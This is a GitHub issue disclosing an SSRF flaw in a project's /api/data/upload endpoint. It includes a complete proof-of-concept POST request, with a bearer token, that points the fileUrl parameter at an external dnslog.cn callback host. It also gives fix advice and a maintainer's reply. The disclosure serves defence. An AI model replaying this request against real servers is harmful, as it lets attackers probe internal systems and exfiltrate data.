Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SSRF Vulnerability in /api/data/upload #284

Open
shadia0 opened this issue Sep 19, 2024 · 1 comment
Open

SSRF Vulnerability in /api/data/upload #284

shadia0 opened this issue Sep 19, 2024 · 1 comment
Assignees
@fanyinbo

Comments

@shadia0
Copy link

shadia0 commented Sep 19, 2024

Describe the bug

A Server-Side Request Forgery (SSRF) vulnerability was discovered in the /api/data/upload path. The vulnerability is triggered through the fileUrl parameter, which allows an attacker to make arbitrary requests to internal or external systems.

To Reproduce
Send a POST request to /api/data/upload with the fileUrl parameter set to a URL under the attacker's control.
Example request:

`POST /api/data/upload HTTP/1.1
Host: localhost:8190
Content-Length: 88
sec-ch-ua:
sec-ch-ua-mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJCYXNpY0FJIiwiaWF1IjoxNzI2NjU4NTA4LCJleHAiOjE3MjcwOTA2MTcsInN1YiI6IjIifQ.NesghMUWkzzJMiLRDC_g0Tom1m_zVpgD4yS50edvODAHETgxQCT1MQXs4O1YXhmWIaz6LHY7BZo-K94GXnlotg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, /
ignoreCancelToken: true
sec-ch-ua-platform: ""
Origin: http://localhost:8190
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8190/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"fileUrl":"http://fykbyi.dnslog.cn","datasetId":"5","source":"URL","dataFormat":"COCO"}`

image

After sending the request, a DNS request is received on dnslog.cn, confirming that the server made a request to the attacker's controlled domain. This demonstrates that an attacker can craft a malicious HTTP request to trick the application into making requests to arbitrary systems and exfiltrating information to an attacker's external domain.

image

Affected Version
This Vuln Affect latest Version: v0.9.1

Fixes Recommendations
Input Validation: Implement strict validation on the fileUrl parameter to ensure only allowed domains are processed.
Whitelist Approach: Use a whitelist of allowed URLs or domains that the application can access.
@jaggerwang
Copy link
Contributor

Thanks for your feedback, we will fix it later, or you can fix it by sumit a PR.

@jaggerwang jaggerwang assigned fanyinbo and unassigned jaggerwang Sep 27, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@fanyinbo fanyinbo

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@jaggerwang @fanyinbo @shadia0